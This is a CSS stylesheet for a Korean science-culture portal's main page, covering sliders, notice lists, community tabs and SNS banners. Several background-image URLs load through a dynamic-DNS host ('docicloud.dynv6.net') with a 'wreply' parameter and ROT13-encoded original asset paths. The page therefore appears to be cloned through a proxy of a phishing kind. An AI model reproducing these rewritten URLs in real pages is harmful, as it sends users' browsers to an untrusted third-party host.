




/* RightSide.Mypage&TOP Btn  */
.side_right {
  position: absolute;
  z-index: 2;
  right: 0;
  width: 80px;
  height: 590px;
  transition: all 300ms ease-in-out;
}
.side_right.scroll-right {
  position: fixed;
  top: 86px;
  height: calc(100% - 86px);
  background: #fff;
}
.side_right ul { position: relative; width: 100%; height: 100%; }
.side_right li { position: absolute; left: 0; right: 0; margin-left: auto; margin-right: auto; }

.side_right img {
  display: block;
  position: absolute;
  left: 0; right: 0; margin-left: auto; margin-right: auto;
}
.side_right p {
  padding-top: 60px;
}
.side_right span {
  display: block;
  transform: rotate(90deg);
}
.side_right li:first-child {
  top: 20px;
}
.side_right li:last-child {
  bottom: 0;
}


/* RightSide.Mypage&TOP Btn End  */



/* 공통사항 */
.swiper-button-disabled {
  opacity: 0.5;
}
.swiper-notification {
  display: block; position: absolute; left: -9999px; text-indent: 9999px; width: 0; height: 0; border: 0; overflow: hidden; font-size: 0; line-height: 0; white-space: nowrap
}
.sec_tit {
  position: relative;  
  color: #282828;
  max-width: 1400px;
  width: 88%;
  margin: 0 auto;
  box-sizing: border-box;
  line-height: 25px;
  z-index: 3;
  text-align: center;
}
.sec_tit.sec_flex {
  display: flex;
  justify-content: space-between;
  text-align: left;
}
.sec_tit h2 {
  font-size: 32px;
  font-weight: 600;
  font-family: 's-core_dream7', sans-serif;
  line-height: 1.3;
  word-break: keep-all;
}
.sec_tit h2 + p { color: #777; margin-top: 5px; }
.sec_tit ul { display: flex; align-items: flex-end; gap: 10px; position: relative; top: 13px; right: 17px;}
.sec_tit ul li {
  border-bottom: 3px solid transparent;
  font-size: 14px;
  background: #fff;
  border: 1px solid #17375e;
  padding: 3px 32px;
  border-radius: 100px;
  font-family: 's-core_dream6', sans-serif;
}
.sec_tit ul li a { color: #17375e; }
.sec_tit ul li.on a { color: #fff;}
.sec_tit ul li.on {
  position: relative;
  background: #17375e; 
}

.inner_Body > section { padding-bottom: 110px; }

.moreV {
  padding: 7px 20px;
  background: #383838;
  color: #fff;
  border-radius: 100px;
  font-size: 14px;
  font-weight: 600;
  width: fit-content;
  display: block;
  margin: 35px auto 0;
  border: 2px solid #383838;
}
.moreV:hover,
.moreV:focus-within
 {
  background: #fff; color: #383838;
  border: 2px solid #383838;
}
.sec_tabs .moreBtn {
  width: 26px; height: 26px;
  background: #17375e;
  border: none;
  position: absolute;
  top: -42px;
  right: 22px;
  border-radius: 5px;
}
.sec_tabs .moreBtn:hover {
  border: 2px solid #17375e;
  background: #fff;
}
.sec_tabs .moreBtn::after {
  content: "";
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2Svzt%2Sznva%2Svpb-zber.cat") no-repeat center top;
  width: 12px; height: 12px;
  position: absolute;
  top: 50%; left: 50%;
  transform: translate(-50%, -50%);
  
}

.tab_wrap {
  padding-top: 5px;
  position: relative;
}

.tab_wrap .moreBtn:hover::after {
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2Svzt%2Sznva%2Svpb-zber.cat") no-repeat center bottom;
}
.sec_tabs {
  max-width: 1400px;
  width: 100%;
  margin: 0 auto;
  display: none;
}
.sec_tabs.on {
  display: block;
}

.tcList .tcList-flex { display: flex; }
.commu_wrap .sec_tabs .tab_inner {
  display: flex;
  gap:40px;
}
.sec_tabs.tab1 .tcList {
  width: 100%;
  max-width: 1042px;
  box-sizing: border-box;
  padding: 25px 45px;
}

.sec_tabs.tab1 .tcList,
.sec_tabs.tab1 .tcSearch li {
  box-shadow: 0 0 30px -5px #e6e6e6;
  border-radius: 25px;
  background: #fff;
}
.sec_tabs.tab1 .tcList ul {
  box-sizing: border-box;
}
.sec_tabs.tab1 .tcList li {
  line-height: 50px;
}
.tcList {
    position: relative;
}
.tcList ul {
    display: grid;
    /* grid-template-columns: repeat(3, 1fr) 7% repeat(2, 1fr) 7% 1fr; */
    grid-template-columns: repeat(auto-fit, minmax(10%, 1fr));
    grid-column-gap: 2px;
    margin-bottom: 2px;
    overflow: hidden;
}
.tcList li {
    display: flex;
    line-height: 1.5;
    white-space: pre-line;
    word-break: break-all;
    justify-content: center;
    align-items: center;
    overflow: hidden;
}
.tcList .list-head li:nth-child(4),
.tcList .list-head li:nth-child(5) {
    grid-column: span 2
}
.tcList .list-head {
    position: relative;
    background: #f9f9f9;
    border-radius: 12px;
}
.tcList .list-body { border-bottom: 1px dashed #dddddd; }
.tcList .list-body li {
  transform: rotate(-0.03deg);
}
.tcList .list-body li:nth-child(6) {
  font-weight: 500;
}
.tcList .list-body li p.tcL-rec {
  color: #c72535; /* 모집중 */
} 
.tcList .list-body li p.tcL-res {
  color: #17375e; /* 예약 */
} 
.tcList .list-body li p.tcL-com {
  color: #999999 /* 예약 */
} 
.tcList .list-body:last-child { border: none;}



/* 메인 비주얼 */
.inner_Body >  section.main_wrap {
  width: 100%;
  max-width: 1400px;
  margin: 0 auto;
  gap: 40px;
  margin: 35px auto 90px auto;
  padding-bottom: 0;
  display: grid;
  grid-template-columns: 2.091fr 1fr;
}


/**/

.main_wrap .alc_inner {
  margin-bottom: 25px;
  display: none;
}
.main_wrap .alc_inner .search_ver {
  top: 0;
  left: 0;
  margin: 0 auto;
  position: relative;
  transform: none;
  -webkit-transform: none;
  z-index: 2;
  height: 42px;
  border: 2px solid #17375e;
  width: 100%;
}
.main_wrap .alc_inner .search_ver a.btn_newserch {
  text-indent: -9999px;
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2S..%2S..%2S_fgngvp%2Sfpvraprnyy%2Svzt%2Spbzzba%2SfrnepuOg2.cat") no-repeat 0 0;
}

.main_wrap .alc_inner .search_ver .head_serch {
  height: 38px;
  width: 100%;
}
.main_wrap .alc_inner .search_ver .head_serch:focus {
  background: #dff4ff;
  outline: none;
}

/**/

.main_wrap .main_slide_inner {
  overflow: hidden;
  border-radius: 25px;
  box-shadow: -1px 17px 20px -12px #848484;
}
.main_wrap .msWrap {
  position: relative;
  overflow: hidden;
  height: 100%;
}
.main_wrap .msWrap .utileBox {
  position: absolute;
  bottom: 26px;
  width: 100%;
  z-index: 3;
  display: flex;
  left: 30px;
}

.main_wrap .msWrap .msArrows {
  display: flex;
  margin-left: 0.4%;
}
.main_wrap .msWrap .msArrows *{
  padding: 1px 2px;
}
.main_wrap .msWrap .msArrows img{
  vertical-align: middle;
}
.main_wrap .msWrap .utileBox .mv-prev,
.main_wrap .msWrap .utileBox .mv-next {
  cursor: pointer;
  margin-top: 1px;
}

.main_wrap .msWrap .msPagination {
  width: auto;
  line-height: 1.7;
  font-size: 15px;
  color: #fff;
  font-weight: 600;
  text-shadow: 0px 0px 3px #444;
}
.main_wrap .msWrap .msPagination .swiper-pagination-bullet {
  width: 6px; height: 6px; background: #fff; border:none;
  opacity: 1; margin: 0 2px;
  border-radius: 100px;
  transition: width 500ms ease-in-out;
  
}
.main_wrap .msWrap .msPagination .swiper-pagination-bullet-active {
  width: 24px; height: 6px;
}

.main_wrap .msWrap .swiper-slide {
  border-radius: 25px;
  overflow: hidden;
}
.main_wrap .msWrap .swiper-slide:focus-within {
  outline: 3px solid #000;
  outline-offset: -3px;
}


.main_wrap .msWrap .swiper-slide img {
  width: 100%;height: 100%;
  object-fit: cover;
  background-size: cover;
}
.main_wrap .main_slide_inner .msWrap .stext {
  position: absolute;
  width: 100%;
  top: 10%;
  left: 7%;
  color: #fff;
}
.main_wrap .main_slide_inner .msWrap .stext .copy-head {
  font-family: 's-core_dream7', sans-serif;
  font-size: 57px; font-weight: 600;
}
.main_wrap .main_slide_inner .msWrap .stext .copy-body {
  font-size: 16px; font-weight: 400;
  width: 60%;
  margin-top: 20px;
  line-height: 29px;
}
.main_wrap .main_slide_inner .msWrap .stext .ms-more {
  margin-top: 86px;
}
.main_wrap .main_slide_inner .msWrap .stext .ms-more a {
  font-size: 18px; font-weight: 600;
  color: #fff; background: #353535;
  border-radius: 50px;
  padding: 8px 20px;
}


.main_wrap .mw_right .mw_banner {
  text-align: center;
  margin: 0 auto 35px;
}
.main_wrap span.swiper-notification { display: none; }

.main_wrap .sc_inner .search_ver {
  top: 0;
  left: 0;
  margin: 0 auto;
  position: relative;
  transform: none;
  -webkit-transform: none;
  z-index: 2;
  height: 42px;
  border: 2px solid #17375e;
  width: 100%;
}
.main_wrap .sc_inner .search_ver a.btn_newserch {
  text-indent: -9999px;
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2S..%2S..%2S_fgngvp%2Sfpvraprnyy%2Svzt%2Spbzzba%2SfrnepuOg2.cat") no-repeat 0 0;
}

.main_wrap .sc_inner .search_ver .head_serch {
  height: 38px;
  width: 100%;
}
.main_wrap .sc_inner .search_ver .head_serch:focus {
  background: #dff4ff;
  outline: none;
}
.main_wrap .mw_right .qlink ul {
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  column-gap: 50px;
  row-gap: 40px;
  justify-content: center;
}
.main_wrap .mw_right .qlink {
  box-sizing: border-box;
  width: 75%;
  margin: 0 auto;
}
.main_wrap .mw_right .qlink li {
  position: relative;
  transition: all 5s
}
.main_wrap .mw_right .qlink li img {
  display: block; margin: 0 auto;
  box-shadow: 0px 1px 12px -5px #333;
  overflow: hidden;
  border-radius: 18px;
  position: relative;
  transition: all 200ms ease-in-out;
  top: 0;
}
.main_wrap .mw_right .qlink li:hover span {
  color: #17375e;
  font-weight: 600;
}
.main_wrap .mw_right .qlink ul:first-child li:first-child:hover img {
  top: 0;
}
.main_wrap .mw_right .qlink li:hover span::after {
  content: "";
  width: 14px;
  height: 14px;
  border-radius: 100%;
  background: #d0e5ff;
  position: absolute;
  opacity: 0.5;
  z-index: -1;
  right: -8px;
  bottom: 7px;
}
.main_wrap .mw_right .qlink li:hover img {
  top: -5px;
  
}
.main_wrap .mw_right .qlink a > span {
  display: block;
  text-align: center;
  font-size: 14px;
  line-height: 2.6;
  position: absolute;
  left: 50%; transform: translateX(-50%) rotate(-0.03deg);
  white-space: nowrap;
  font-weight: 500;
  color: #383838;
}
.main_wrap .mw_right h3 {
  font-size: 18px;
  font-family: 's-core_dream7', sans-serif;
  text-align: center;
  margin: 50px 0 20px 0;
}
/* 메인 비주얼 끝 */



.sec_tabs.tab1 .tcSearch { max-width: 320px; }
.tcList > div, .tcList > div ul {  width: 100%; }
.tcList li a { display: block; }
.tcList .tcList-tit {
  background: #f9f9f9;
}

.sec_tabs.tab1 .tcSearch ul {
  display: flex;
  flex-wrap: wrap;
  box-sizing: border-box;
  row-gap: 40px;
}
.sec_tabs.tab1 .tcSearch li {
  padding:46px 55px;
  width: 100%;
  line-height: 4;
  box-sizing: border-box;
}
.sec_tabs.tab1 .tcSearch li:hover {
  outline: 2px solid #17375e;
}


.sec_tabs.tab1 .tcSearch a {
  display: flex;
  font-size: 22px;
  font-weight: 500;
  transform: rotate(-0.03deg);
  justify-content: center;
}
.sec_tabs.tab1 .tcSearch img {
  width: 70px;
  display: block;
  margin-right: 20px;
}


.content_wrap .data_wrap .data-item .SbPagination,
.content_wrap .commu_wrap .info-item .SbPagination {
  width: 100%;
  position: absolute;
  bottom: 0;
  text-align: center;
  display: none;
}

.content_wrap .data_wrap .data-item .SbPagination .swiper-pagination-bullet,
.content_wrap .commu_wrap .info-item .SbPagination .swiper-pagination-bullet {
  width: 11px; height: 11px; background: transparent; border:none;
  border: 2px solid #17375e;
  opacity: 1; margin: 0 4px;
  border-radius: 100px;
  transition: width 500ms ease-in-out;
}
.content_wrap .data_wrap .data-item .SbPagination .swiper-pagination-bullet-active, 
.content_wrap .commu_wrap .info-item .SbPagination .swiper-pagination-bullet-active
{
  width: 11px; height: 11px;
  background: #17375e;
}
.commu_wrap .sec_tabs.tab2,
.data_wrap .sec_tabs {
  max-width: 1400px;
  position: relative;
}

/* 소통마당 */

.commu_list {
  overflow: hidden;
  padding:10px 10px 10px 10px;
}
.commu_item {
  position: relative;
  max-width: 100%;
  box-shadow: 0 0 20px -5px #e6e6e6;
}
.commu_item figure {
  background: #fff;
  box-sizing: border-box;
}
.commu_item figure div {
  width: 100%;
  object-fit: fill;
}
.commu_item figure div img {
  width: 100%; height: 260px;
  object-fit: cover;
}
.commu_item span {
  position: absolute;
  top: -6px;
  left: -6px;
  color: #fff;
  padding: 10px 19px;
  border-radius: 12px 0;
}

.commu_item figure figcaption {
  padding: 22px 15px;
  height: 125px;
  box-sizing: border-box;
}


.commu_item:nth-child(1) span { background: #ca3d3d; }
.commu_item:nth-child(2) span { background: #f79147; }
.commu_item:nth-child(3) span { background: #25b34e; }
.commu_item:nth-child(4) span { background: #185385; }
.commu_item:nth-child(5) span { background: #7b537c; }



/* 소통마당 Tab02 end */

/* //소통마당 */


/* 알림마당 */

.notice_wrap {
  background: #f9f9f9;
}
.notice_wrap .sec_tabs .tab_inner {
  display: flex;
  gap:40px;
}

.notice_wrap .titBanner {
  box-sizing: border-box;
  padding-top: 30px;
  max-width: 440px;
  width: 40%;
  flex:1;
}
.notice_wrap .titBanner > figure > figcaption > a {
  display: block;
  text-indent: 18px;
  margin-top: 24px;
  font-size: 19px;
  letter-spacing: -0.6px;
  transform: rotate(-0.03deg);
  font-weight: 500;
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 90%;
  
}
.notice_wrap .sec_tabs .moreBtn {
  right: 15px;
}
.notice_wrap .sec-notice {
  width: calc(100% - 470px);
}
.notice_wrap .sec-notice ul {
  line-height: 1;
  border-top: 2px solid #111;
  letter-spacing: -0.6px;
}
.notice_wrap .sec-notice li {
  display: flex;
  flex-wrap: nowrap;
  justify-content: space-between;
  padding: 28px 0 26px 0;
  border-bottom: 1px solid #bbb;
  position: relative;
}
.notice_wrap .sec-notice li a {
  width: 78%;
  text-indent: 30px;
  overflow: hidden;
}
.notice_wrap .sec-notice li span {
  text-align: center;
  color: #999999;
  font-size: 14px;
  position: absolute;
  right: 3%;
  top: 50%;
  transform: translateY(-50%);
}
.notice_wrap .sec-notice ul li dl {
  transform: rotate(-0.03deg);
}
.notice_wrap .sec-notice ul li a dt {
  font-size: 18px;
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 90%;
  max-width: fit-content;
  padding: 10px 0;
  font-weight: 500;
}
.notice_wrap .sec-notice .label-new a dt {
  color: #17375e;
  position: relative;
  padding-right: 26px;
}
.notice_wrap .sec-notice .label-new a dt::after {
  content: "";
  font-size: 15px;
  color: #fff;
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2S..%2Sfgrnz%2Svzt%2Spbzzba%2Svpb-arj.cat") no-repeat 0 0;
  border-radius: 100px;
  width: 20px; height: 20px;
  position: absolute;
  right: 0;
}

.notice_wrap .sec-notice ul li a dd {
  font-size: 15px;
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 100%;
  color: #999999;
  font-weight: 400;
}

/* //알림마당 */



/* 추천자료 */

.data_wrap .sec_tabs .tab_inner {
  max-width: 1400px;
  overflow: hidden;
  padding: 30px 0 0;
}

section .swiper-button-prev,
section .swiper-button-next {
  --swiper-navigation-size: 19px;
  font-weight: 900;
  color: #555;
  background: #fff;
  border-radius: 100px;
  box-shadow: 0px 0px 15px -8px #000;
  top: 37%;
  z-index: 2;
}

section .swiper-button-prev {
  padding: 23px 26px 23px 23px;
  left: -25px;
  /* left: 2.5%; */
}
section .swiper-button-next {
  padding: 23px 23px 23px 26px;
  right: -25px;
  /* right: 2.5%; */
}

.data-item { overflow: hidden; padding: 1px; }
.data-item .swiper-slide {
  outline: 1px solid #ddd;
  border-radius: 20px;
  position: relative;
}
.data-item .swiper-slide a {
  outline: none;
}

.data-item .swiper-slide:focus-within,
.data-item .swiper-slide:hover {
  outline: 6px solid #17375e;
  outline-offset: -5px;
}

/* .data-item .swiper-slide-active:focus-within,
.data-item .swiper-slide:focus-within:hover {
  outline: 6px solid #4a64f6;
  outline-offset: -5px;
} */
.data-item .swiper-slide .Sthumb {
  border: 1px solid #e0e0e0;
  overflow: hidden;
  border-radius: 20px;
  padding-bottom: 5px;
  height: 100vw;
  max-height: 340px;
}

.data-item .swiper-slide .Sthumb img {
  width: 100%;
  object-fit: contain;
}
.data-item .swiper-slide .DLabel {
  position: absolute;
  top: -6px;
  left: -6px;
  color: #fff;
  padding: 10px 19px;
  border-radius: 12px 0;
  background: #ca3d3d; 
}
.data-item .swiper-slide .stext {
  padding: 45px 35px;
  letter-spacing: -0.7px;
}
.data-item .swiper-slide .stext a {
  display: block;
}
.data-item .swiper-slide .stext strong {
  font-weight: 900;
  color: #17375e;
}


.data-item .swiper-slide .stext dt {
  line-height: 1.5;
  font-weight: 500;
  box-sizing: border-box;
  font-size: 18px;
  margin: 15px 0;
  height: 54px;
}
.data-item .swiper-slide .stext dd {
  line-height: 1.4;
  font-size: 14px;
  color: #919191;
  height: 40px;

}
.data-item .swiper-slide .stext span > i {
  margin-right: 8px;
}
.data-item .swiper-slide .stext span {
  font-size: 14px;
  color: #777777;
  margin-top: 60px;
  display: block;
}



.data_wrap .sec_tabs .tab_inner {
  max-width: 1400px;
  overflow: hidden;
  margin: 0 auto;
}
/* //추천자료 */


/* 전국의 과학문화 프로그램 */

.inner_Body .scip_wrap {padding-bottom: 75px;}
.scip_wrap {
  max-width: 1400px;
  width: 100%;
  margin: 0 auto;
  box-sizing: border-box;
  position: relative;
}
.scip_wrap .scip_inner {
  max-width: 1400px;
  overflow: hidden;
  margin: 0 auto;
  padding: 0;
  margin-top:33px
}
.scip-item {
  max-width: 1400px;
  margin: 0 auto;
  padding-top: 33px;
  overflow: hidden;
  padding: 1px;
}
.scip-item .swiper-button-prev, .scip-item .swiper-button-next { top: 43%; }
.scip-item .swiper-slide {
  outline: 1px solid #ddd;
  border-radius: 20px;
  position: relative;
  overflow: hidden;
}



.scip-item .swiper-slide a {
  outline: none;
}
.scip-item .swiper-slide:focus-within,
.scip-item .swiper-slide:hover {
  background:  #17375e; 
}


.scip-item .swiper-slide .Sthumb {
  max-height: 348px;
  overflow: hidden;
  width: auto;
}
.scip-item .swiper-slide .Sthumb img {
  width: 100%;
  object-fit: cover;
  height: 300px;
}

.scip-item .swiper-slide .stext {
  letter-spacing: -0.7px;
  overflow: hidden;
}
.scip-item .swiper-slide .stext > strong {
  font-weight: 600;
  color: #17375e;
}
.scip-item .swiper-slide .stext dl {
  padding: 15px 30px;
  min-height: 155px;
}
.scip-item .swiper-slide .stext dt {
  line-height: 1.5;
  font-weight: 500;
  box-sizing: border-box;
  font-size: 18px;
  display: -webkit-box;
  word-wrap: break-word;
  -webkit-line-clamp: 2;
  -webkit-box-orient: vertical;
  text-overflow: ellipsis;
  overflow: hidden;
  min-height: 54px;
}
.scip-item .swiper-slide .stext dd {
  line-height: 1.4;
  font-size: 14px;
  color: #999999;
  max-height: 42px;
  display: block;
  word-wrap: break-word;
  white-space: nowrap;
  text-overflow: ellipsis;
  overflow: hidden;
  margin-top: 18px;
}
.scip-item .swiper-slide .stext dd:has(span) {
  margin-top: 5px;
}
.scip-item .swiper-slide .stext span > i {
  margin-right: 8px;
}
.scip-item .swiper-slide .stext span {
  font-size: 14px;
  color: #777777;
  display: block;
}




.scip_inner .scip-item .swiper-slide:hover *,
.scip_inner .scip-item .swiper-slide:focus-within *,
.scip_inner .scip-item .swiper-slide:focus-within:hover * {
  color: #fff;
}

/*//전국의 과학문화 프로그램 */

/* 알림존 */
.alert_zone {
  width: 100%;
  background: #f0f3ff;
  padding: 80px 0;
}
.alert_zone .ar_inner {
  display: flex;
  justify-content: space-between;
  width: 100%;
  max-width: 1400px;
  margin: 0 auto;
  gap: 2vw;
}
.alert_zone .ar_inner > div {
  width: 100%;
  max-width: fit-content;
  overflow: hidden;
  position: relative;
  border-radius: 20px;
  border: 1px solid #ddd;
  background: #fff;
}

.alert_zone .utileBox {
  position: absolute;
  width: 100%;
  z-index: 3;
  display: flex;
  padding: 18px;
  justify-content: space-between;

}

.alert_zone .alArrows {
  display: flex;
  align-items: center;
}
.alert_zone .alArrows *{
  padding: 0 2px;
}
.alert_zone .alArrows img{
  display: block;
}
.alert_zone .utileBox .al-prev,
.alert_zone .utileBox .al-next {
  cursor: pointer;
  text-indent: -9999px;
  position: relative;
}
.alert_zone .utileBox h3 {
  font-size: 1.35rem;
  font-family: 's-core_dream7', sans-serif;
  color: #333;
}
.alert_zone .utileBox h3+span {
  font-size: 0.9rem;
  color: #777;
  position: absolute;
  top: 50px;
}

.alert_zone .utileBox .swiper-Pagination {
  width: auto;
  line-height: 1.7;
  font-size: 15px;
  color: #333;
  font-weight: 700;
  margin: -4px 10px 0 0;
}
.alert_zone .utileBox .swiper-Pagination ~ * {
  filter: invert(0.8);
}
.alert_zone .utileBox .swiper-Pagination .swiper-pagination-bullet {
  width: 6px; height: 6px; background: #fff; border:none;
  opacity: 1; margin: 0 2px;
  border-radius: 100px;
  transition: width 500ms ease-in-out;
  
}
.alert_zone .utileBox .swiper-Pagination .swiper-pagination-bullet-active {
  width: 24px; height: 6px;
}

.alert_zone .swiper-slide:focus-within {
  outline: 3px solid #000;
  outline-offset: -3px;
}
.alert_zone > div .swiper-slide {
  overflow: hidden;
  border-radius: 20px;
}

.alert_zone > div .swiper-slide a {
  outline: none;
}
.alert_zone > div .swiper-slide img {
  width: 100%;height: 100%;
  object-fit: cover;
  background-size: cover;
}


.alert_zone .wdThumb {
  width: 92%;
  margin: 0 auto;
  margin-top: 122px;
}
.alert_zone .wdThumb > p {
  line-height: 1.3;
  font-size: 1.1rem;
  font-weight: 600;
  color: #333;
  padding: 20px 0;
}

/* //알림존 */

/* 이슈존 */

.issue_zone {
  width: 100%;
  margin: 0 auto;
  padding: 80px 0;
  position: relative;
  overflow-x: auto;
}
.issue_zone .is_inner {
  width: 100%;
  max-width: 1400px;
  min-width: 1080px;
  margin: 0 auto;
  display: flex;
  gap: 30px;
  justify-content: space-between;
}
.issue_zone .is_inner > div {
  position: relative;
  max-width: 440px;
  width: 100%;
}
.issue_zone .is_tit {
  display: flex;
  justify-content: space-between;
  align-items: flex-end;
  font-family: 's-core_dream6', sans-serif;
  padding-bottom: 25px;
}
.issue_zone .is_tit h3 {
  font-size: 1.5rem;
}
.issue_zone .is_tit h3 > a {
  padding: 0.3vw 2vw;
  font-size: 14px;
  font-family: 's-core_dream4', sans-serif;
  background: #17375e;
  color: #fff;
  position: relative;
  top: -4px;
  border-radius: 100px;
  margin-left: 10px;
  border: 2px solid transparent;
  transition: background 200ms ease-in-out;
}
.issue_zone .is_tit h3 > a:hover,
.issue_zone .is_tit h3 > a:focus-within {
  background: #fff;
  color: #17375e;
  outline: 2px solid #17375e;
  outline-offset: -2px;
}

.issue_zone .is_tit h3 > button:hover,
.issue_zone .is_tit h3 > button:focus-within {
  background: #fff;
  color: #17375e;
  font-weight: 700;
  border: 2px solid #17375e;
}
.issue_zone .is_tit h3 > button:focus-within:hover {
  color: #4a64f6;
}
.issue_zone .is_tit h3 + a {
  font-size: 0.75rem;
}
.issue_zone .is_tit h3 + a:hover,
.issue_zone .is_tit h3 + a:focus,
.issue_zone .is_tit h3 + a:focus-within {
  outline: none;
  font-weight: 700;
  color: #17375e;
  text-decoration: underline;
}
.issue_zone .is_thumb {
  height: 300px;
  overflow: hidden;
  border-radius: 20px;
  border: 1px solid #ddd;
  position: relative;
}
.issue_zone .is_thumb a > img {
  object-fit: cover;
  object-position: top;
  height: 100%;
  width: 100%;
}
.issue_zone .is_cont:has(.is_thumb a:hover) h3,
.issue_zone .is_cont:has(.is_thumb a:focus-within) h3
 {
  color: #17375e;
}
.issue_zone .is_thumb:has(a:hover) {
  box-shadow:0 20px 20px -10px #ddd;
}
.issue_zone .is_thumb:has(a:hover) p,
.issue_zone .is_thumb:has(a:focus-within) p {
  text-decoration: underline;
}
.issue_zone .is_thumb:has(a:focus-within) {
  /* box-shadow: 0 20px 20px -10px #ddd; */
  outline: 1px solid #000;
  offset: -1px;
}
.issue_zone .is_thumb:has(p) img {
  padding-bottom: 60px;
}
.issue_zone .is_thumb img + p {
  position: absolute;
  bottom: 0;
  padding: 20px;
  background: #fff;
}

/* //이슈존 */



/* PR & SNS 시작 */

.pr_wrap {
  width: 100%;
  background: #f9f9f9;
  padding: 50px 0;
  margin: 0 auto;
}
.pr_wrap .pr_inner {
  display: flex;
  gap: 40px;
  width: 95%;
  max-width: 1400px;
  justify-content: center;
  margin: 0 auto;
}
.pr_wrap .pr_inner .pr_banner {
  flex: 1;
  border-radius: 25px;
  background-image: -moz-linear-gradient( -169deg, rgb(0,115,188) 0%, rgb(39,180,79) 100%);
  background-image: -webkit-linear-gradient( -169deg, rgb(0,115,188) 0%, rgb(39,180,79) 100%);
  background-image: -ms-linear-gradient( -169deg, rgb(0,115,188) 0%, rgb(39,180,79) 100%);
  display: flex;
  align-items: center;
  width: 100%;
  justify-content: space-around;
  flex-wrap: wrap;
  padding: 2%;
  box-sizing: border-box;
  transform: rotate(-0.03deg);
}

.pr_wrap .pr_inner .pr_side {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  width: 100%;
  max-width: 540px;
}
.pr_wrap .pr_inner .pr_side p{
  color: #fff;
  border: 1px dashed #fff;
  padding: 5px 16px;
  border-radius: 30px;
  margin-right: 1.5%;
}
.pr_wrap .pr_inner .pr_side a {
  border-radius: 30px;
  padding: 5px 30px;
  color: #333;
  background: #fff;
}
.pr_wrap .pr_inner .pr_side .arw-r {
  display: inline-block;
  background: url("http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2Svzt%2Spbzzba%2Snej-e.cat") no-repeat center center;
  width: 8px; height: 12px;
  margin-left: 16px;
}
.pr_wrap .pr_inner .SNS_inner h3 {
  font-size: 20px;
  font-weight: 500;
  margin-bottom: 31px;
} 
.pr_wrap .pr_inner .SNS_inner ul {
  display: flex;
  justify-content: space-between;
  gap: 10px;
}
.pr_wrap .pr_inner .SNS_inner li {
  width: 81px;
  height: 83px;
  border-radius: 25px;
  box-shadow: 0 0 17px -7px #999;
  position: relative;
}
.pr_wrap .pr_inner .SNS_inner li::before {
  content:"";
  background: url(http://docinfo.docicloud.dynv6.net/portal/?wreply=3mail@a.b.c0&m=uggcf%3N%2S%2Sjjj.fpvraprnyy.pbz%2S_fgngvp%2Sfpvraprnyy%2Spff%2S..%2Svzt%2Sznva%2Svpb-fubeg.cat) no-repeat 0 0;
  width: 25px; height: 25px;
  box-shadow: 0 0 17px -7px #999;
  position: absolute;
  right: -2px;
  top: -2px;
  box-shadow: 2px 0px 7px -3px #999;
  border-radius: 100px;
}
.pr_wrap .pr_inner .SNS_inner li:nth-child(1) { background: #00cb75; }
.pr_wrap .pr_inner .SNS_inner li:nth-child(2) { background: #fdcd01; }
.pr_wrap .pr_inner .SNS_inner li:nth-child(3) { background: #34afe6; }
.pr_wrap .pr_inner .SNS_inner li:nth-child(4) { background: #4169af; }
.pr_wrap .pr_inner .SNS_inner li a {
  height: 100%;
  display: flex;
  align-items: center;
  justify-content: center;
}


/* // PR & SNS */



@media all and (max-width:1800px){
  
  

}

@media all and (max-width:1600px){
  
}
@media all and (max-width:1580px){
  
  .inner_Body { overflow-x: hidden; }
  
  /*소통마당*/
  .commu_list {
    padding:10px 10px 50px 10px;
  }
  /* 스위퍼 버튼 */
  .content_wrap .data_wrap .data-item .SbPagination,
  .content_wrap .commu_wrap .info-item .SbPagination { display: block }
  /* 스위퍼 버튼 */
}



@media all and (max-width:1440px){
  
  .inner_Body > section.main_wrap {
    grid-template-columns: 1.4fr 1fr;
  }

  .data_wrap .sec_tabs .tab_inner,
  .scip_wrap .scip_inner {
    position: relative;
    width: 95%;
    overflow: unset;
  }

}


@media all and (max-width:1400px){



  
  .commu_wrap .sec_tabs.tab1 .tab_inner {
      display: block;
  }
  .commu_wrap .sec_tabs.tab1 .tcList {
      max-width: none;
      margin: 0 auto;
  }
  .commu_wrap .sec_tabs.tab1 .tcSearch {
      width: 100%;
      max-width: none;
      margin-top: 2.5%;
  }
  .commu_wrap .sec_tabs.tab1 .tcSearch ul {
      flex-wrap: nowrap;
      justify-content: space-between;
      gap: 2.5%;
  }

  
}




@media all and (max-width:1024px){

  
/*메인*/
.inner_Body > section.main_wrap {
  display: block;
  width: 95%;
}
.main_wrap .alc_inner {
  display: block;
}
.main_wrap .mw_right .mw_banner {
  margin: 0 auto 4vw;
  padding: 0 5vw;
}
.main_wrap .main_slide_inner {
  margin-bottom: 5vw;
}
.main_wrap .mw_right .qlink h3, 
.main_wrap .mw_right .qlink h3+ul {
  display: none;
}

.main_wrap .mw_right .qlink .sc_inner {margin-top: 70px;}

.main_wrap .mw_right .qlink .sc_inner h3 {display: block;}

.main_wrap .mw_right .qlink { width: 92%; }
.main_wrap .mw_right .qlink ul { grid-template-columns: repeat(6, 1fr); gap: 0; }
/*//메인*/


  /* 알림마당 */
  .notice_wrap {
    background: #f9f9f9;
  }
  .notice_wrap .titBanner {
    width: auto;
